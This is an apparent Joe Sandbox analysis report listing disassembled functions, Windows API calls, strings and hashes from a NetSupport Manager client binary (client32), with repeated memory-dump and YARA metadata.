                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExitProcess$ErrorLastMessageSleep_malloc_memmove_memset_strrchrwsprintf
                                                        • String ID: IsA()$PF%sinclude:*exclude:$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$redirect:
                                                        • API String ID: 3725223747-631189234
                                                        • Opcode ID: 97c419585ee3fcaf63ce288ecccf3252d882957436c914527fee62abe19327b8
                                                        • Instruction ID: af3a808404833258c6c9d3225ee65622eb91d499294cf0e06ea5ce819489668e
                                                        • Opcode Fuzzy Hash: 97c419585ee3fcaf63ce288ecccf3252d882957436c914527fee62abe19327b8
                                                        • Instruction Fuzzy Hash: F8B1D338E00A1B9FDB05DF59DC94BDEF7B6BF8920CF008154E91067685EB31AA04CBA1
                                                        Function 1106B4C0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 279COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
                                                          • Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
                                                          • Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7
                                                        • std::exception::exception.LIBCMT ref: 1106B563
                                                        • __CxxThrowException@8.LIBCMT ref: 1106B578
                                                          • Part of subcall function 11082CA0: _memset.LIBCMT ref: 11082CBF
                                                          • Part of subcall function 11082CA0: InitializeCriticalSection.KERNEL32(0000E3D0,00000000,?,1106B543,00000000,00000000,1117066E,000000FF), ref: 11082D30
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _memset$CriticalException@8InitializeSectionThrow_mallocstd::exception::exceptionwsprintf
                                                        • String ID: Find
                                                        • API String ID: 523791932-1771883322
                                                        • Opcode ID: 8862f12f142f7f17eb3423287ecf04bd00d845d2771b8a10e84e4ddae85b51a2
                                                        • Instruction ID: 5db3a692f28a1e7eabe5ce6be605795cb1bc4f4b77a9999ad3559537c86c9e21
                                                        • Opcode Fuzzy Hash: 8862f12f142f7f17eb3423287ecf04bd00d845d2771b8a10e84e4ddae85b51a2
                                                        • Instruction Fuzzy Hash: 17B16DB5E006099FDB10CFA8C880AAEBBF8FF48314F14456EE416A7340EB75A901CB61
                                                        Function 11041740 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 119windowtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • IsWindow.USER32(?), ref: 11041778
                                                        • _malloc.LIBCMT ref: 110417D7
                                                        • _memmove.LIBCMT ref: 1104183C
                                                        • SendMessageTimeoutA.USER32(?,0000004A,0001042A,00000003,00000002,00002710,?), ref: 1104189C
                                                        • _free.LIBCMT ref: 110418A3
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Message$ErrorExitLastProcessSendTimeoutWindow_free_malloc_memmovewsprintf
                                                        • String ID: IsA()$e:\nsmsrc\nsm\1201\1201f2\ctl32\DataStream.h
                                                        • API String ID: 3610575347-2967710367
                                                        • Opcode ID: 8c3cde6af5e7ac33c6be17841e90698f9797ef0f485e2b0be620b879412e99c7
                                                        • Instruction ID: 5f847ffeaf8ab7aa20607dcdf657b4052752ec8b68bbbdfc22ac1d27c6574067
                                                        • Opcode Fuzzy Hash: 8c3cde6af5e7ac33c6be17841e90698f9797ef0f485e2b0be620b879412e99c7
                                                        • Instruction Fuzzy Hash: BF416F75E0051AAFDB05CF95EC80EDDF3B4BF58718F108269F825A7694EB30A605CB91
                                                        Function 110F9400 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 110threadsynchronizationCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
                                                          • Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
                                                          • Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7
                                                        • CreateThread.KERNEL32(00000000,00000000,110E9400,00000000,00000000,00000000), ref: 110F94CD
                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,1104A1B3), ref: 110F94D8
                                                        • GetExitCodeThread.KERNEL32(00000000,FFFFFFFF,?,1104A1B3), ref: 110F94E3
                                                        • CloseHandle.KERNEL32(00000000,?,1104A1B3), ref: 110F94EA
                                                        • SetLastError.KERNEL32(00000000,?,1104A1B3), ref: 110F9534
                                                          • Part of subcall function 110F8E80: _free.LIBCMT ref: 110F8F24
                                                          • Part of subcall function 110F8E80: _malloc.LIBCMT ref: 110F8F37
                                                          • Part of subcall function 110F8E80: _memmove.LIBCMT ref: 110F8F53
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Thread_malloc$CloseCodeCreateErrorExitHandleLastObjectSingleWait_free_memmove_memsetwsprintf
                                                        • String ID: Client$OldLogonUser
                                                        • API String ID: 2273177647-3714759566
                                                        • Opcode ID: c749c10b528402f76e781cde6db9bcf01e9e5f43c0efe7e3d428c594cd5ae9c0
                                                        • Instruction ID: 2f702813f4b4ab6c25c38db0d8a5041f92371cc8998c0e340031248ecbe83333
                                                        • Opcode Fuzzy Hash: c749c10b528402f76e781cde6db9bcf01e9e5f43c0efe7e3d428c594cd5ae9c0
                                                        • Instruction Fuzzy Hash: 624135B5D0561A9FDB00DFA4C845BEEB7F4EB49324F104619F925A7380EB34A500CBA1
                                                        Function 1100F380 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 1100F3AD
                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 1100F3D0
                                                        • std::bad_exception::bad_exception.LIBCMT ref: 1100F454
                                                        • __CxxThrowException@8.LIBCMT ref: 1100F462
                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 1100F475
                                                        • std::locale::facet::_Facet_Register.LIBCPMT ref: 1100F48F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                        • String ID: bad cast
                                                        • API String ID: 2427920155-3145022300
                                                        • Opcode ID: d1a36058dcafd43632a995b00d63964de3846e5127b68f0cf164bd7fd6529456
                                                        • Instruction ID: c1df3a49ef77ffe82b92d999ae27bd748b28a168d2cc7080f961c8e04f266e9b
                                                        • Opcode Fuzzy Hash: d1a36058dcafd43632a995b00d63964de3846e5127b68f0cf164bd7fd6529456
                                                        • Instruction Fuzzy Hash: F631A075D002169FDB15CF58C884B9EF7B8EB0576CF52466DEC21A7680DB30AA40CB93
                                                        Function 11021260 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 77windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetDlgItemTextA.USER32(?,?,11182200), ref: 110212D6
                                                        • GetDlgItem.USER32(?,?), ref: 110212EA
                                                        • SetFocus.USER32(00000000), ref: 110212ED
                                                        • GetDlgItem.USER32(?,?), ref: 11021318
                                                        • EnableWindow.USER32(00000000,00000000), ref: 1102131D
                                                        Strings
                                                        • e:\nsmsrc\nsm\1201\1201f2\ctl32\nsmdlg.h, xrefs: 11021301
                                                        • m_hWnd, xrefs: 11021306
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Item$EnableFocusTextWindow
                                                        • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\nsmdlg.h$m_hWnd
                                                        • API String ID: 467963834-3304639117
                                                        • Opcode ID: 3cc505f6fa39f18cb636a32da8b2f10ffb60bb9d01c7e8319a9f9713b2288b6a
                                                        • Instruction ID: 0817eb63cdeeee23d12745cd5909b56861137a8bde73a4db9cb5005db0e53ffe
                                                        • Opcode Fuzzy Hash: 3cc505f6fa39f18cb636a32da8b2f10ffb60bb9d01c7e8319a9f9713b2288b6a
                                                        • Instruction Fuzzy Hash: 09216A76A00700AFD711DB55CC84F9BFBE9FB49714F408929F95697784C774A900CBA0
                                                        Function 1103D7F0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 77windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ExtractIconA.SHELL32(00000000,?,00000000), ref: 1103D83C
                                                        • SetDlgItemTextA.USER32(?,00000471,?), ref: 1103D854
                                                        • DestroyCursor.USER32(00000000), ref: 1103D871
                                                        • SetDlgItemTextA.USER32(?,00000471,00000000), ref: 1103D884
                                                        • UpdateWindow.USER32(00000000), ref: 1103D8C2
                                                          • Part of subcall function 1107C480: _strrchr.LIBCMT ref: 1107C48E
                                                        Strings
                                                        • e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 1103D8AC
                                                        • m_hWnd, xrefs: 1103D8B1
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ItemText$CursorDestroyExtractIconUpdateWindow_strrchr
                                                        • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                        • API String ID: 3726914545-1557312927
                                                        • Opcode ID: 1c2e4270b89d1f92e4223b88513b542f8f80d8360a50bd76c529a1a7560ce8a3
                                                        • Instruction ID: 110cd72dad802746724e554e61a36281017b722033c1a59c3057b23866efb7ab
                                                        • Opcode Fuzzy Hash: 1c2e4270b89d1f92e4223b88513b542f8f80d8360a50bd76c529a1a7560ce8a3
                                                        • Instruction Fuzzy Hash: CF21F3B9A50301BFE211AB75CC4AF9FF7E8AB85B05F108418F6599B2C0DBB0B4008764
                                                        Function 1114D210 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 75windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetMenuItemCount.USER32(?), ref: 1114D21F
                                                        • _memset.LIBCMT ref: 1114D23B
                                                        • GetMenuItemID.USER32(?,00000000), ref: 1114D24C
                                                          • Part of subcall function 11132220: _memset.LIBCMT ref: 11132249
                                                          • Part of subcall function 11132220: GetVersionExA.KERNEL32(?), ref: 11132262
                                                        • CheckMenuItem.USER32(?,00000000,00000000), ref: 1114D288
                                                        • EnableMenuItem.USER32(?,00000000,00000000), ref: 1114D29E
                                                        • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 1114D2B4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ItemMenu$_memset$CheckCountEnableInfoVersion
                                                        • String ID: 0
                                                        • API String ID: 176136580-4108050209
                                                        • Opcode ID: 9b42af547c3b3f2de27c1a2824a71c6ae62b3914f0dc5bd063f9124c19224f7e
                                                        • Instruction ID: 6978873c477c3921339f3242224bee586a119fd3f67b17aa56fa8a5c95e1a494
                                                        • Opcode Fuzzy Hash: 9b42af547c3b3f2de27c1a2824a71c6ae62b3914f0dc5bd063f9124c19224f7e
                                                        • Instruction Fuzzy Hash: 74216F71901219BBEF029BA4DD88FAFBBADEF59759F604025F801D6144E7B0DA00C760
                                                        Function 11123340 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 66libraryloadertimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetProcAddress.KERNEL32(?,DwmEnableComposition), ref: 11123391
                                                        • KillTimer.USER32(?,00000081,82E0FB89,75A33760,00000000,00000000,11178FC1,000000FF), ref: 111233D1
                                                        • GlobalDeleteAtom.KERNEL32 ref: 111233ED
                                                        • FreeLibrary.KERNEL32(?,?,82E0FB89,75A33760,00000000,00000000,11178FC1,000000FF), ref: 111233FE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressAtomDeleteFreeGlobalKillLibraryProcTimer
                                                        • String ID: DwmEnableComposition$e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                        • API String ID: 239104392-1158585097
                                                        • Opcode ID: ac4ce4fd3e0cbf1a108bfb6aaa5dbba282e11219c93081d954dc0a5653b48ec3
                                                        • Instruction ID: 339d7fcd6c78bba5dbca9370eb91404beaec97e96fcf5122cf5d8dfe16e34f39
                                                        • Opcode Fuzzy Hash: ac4ce4fd3e0cbf1a108bfb6aaa5dbba282e11219c93081d954dc0a5653b48ec3
                                                        • Instruction Fuzzy Hash: 2C21D475A18715EFD721CF65C844B9AFBE8FB09718F10891DE8A683780DB74A540CB61
                                                        Function 11071330 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
                                                          • Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
                                                          • Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7
                                                        • GlobalAddAtomA.KERNEL32(NSMCoolbar), ref: 11071385
                                                        • GetSysColor.USER32(0000000F), ref: 110713A3
                                                        • GetSysColor.USER32(00000014), ref: 110713AA
                                                        • GetSysColor.USER32(00000010), ref: 110713B1
                                                        • GetSysColor.USER32(00000008), ref: 110713B8
                                                        • GetSysColor.USER32(00000016), ref: 110713BF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Color$AtomGlobal_malloc_memsetwsprintf
                                                        • String ID: NSMCoolbar
                                                        • API String ID: 1237614650-4124301854
                                                        • Opcode ID: 11a3e492c884ad001f6ac068dd0781362c712dc6c6d88ecbd5fc8d9c0d6a6434
                                                        • Instruction ID: 08995c28d4e1244f6da182c4ab23949e1325013c8a7c5b32581c9b49482f3fa5
                                                        • Opcode Fuzzy Hash: 11a3e492c884ad001f6ac068dd0781362c712dc6c6d88ecbd5fc8d9c0d6a6434
                                                        • Instruction Fuzzy Hash: C1118EB1A00788AFE720CF65CC85B5AFBE4FB09758F404A3EE55587B80DB75E9008B94
                                                        Function 110AF260 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 110AF2A6
                                                        • GetFileVersionInfoSizeA.VERSION(?,?), ref: 110AF2BC
                                                        • _malloc.LIBCMT ref: 110AF2C7
                                                          • Part of subcall function 111515D1: __FF_MSGBANNER.LIBCMT ref: 111515EA
                                                          • Part of subcall function 111515D1: __NMSG_WRITE.LIBCMT ref: 111515F1
                                                          • Part of subcall function 111515D1: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 11151616
                                                        • GetFileVersionInfoA.VERSION(?,?,00000000,00000000,?), ref: 110AF2E1
                                                        • VerQueryValueA.VERSION(00000000,11187354,?,?,?,?,00000000,00000000,?), ref: 110AF2FA
                                                        • _free.LIBCMT ref: 110AF30A
                                                          • Part of subcall function 11151665: HeapFree.KERNEL32(00000000,00000000,?,1115A186,00000000,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 1115167B
                                                          • Part of subcall function 11151665: GetLastError.KERNEL32(00000000,?,1115A186,00000000,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 1115168D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
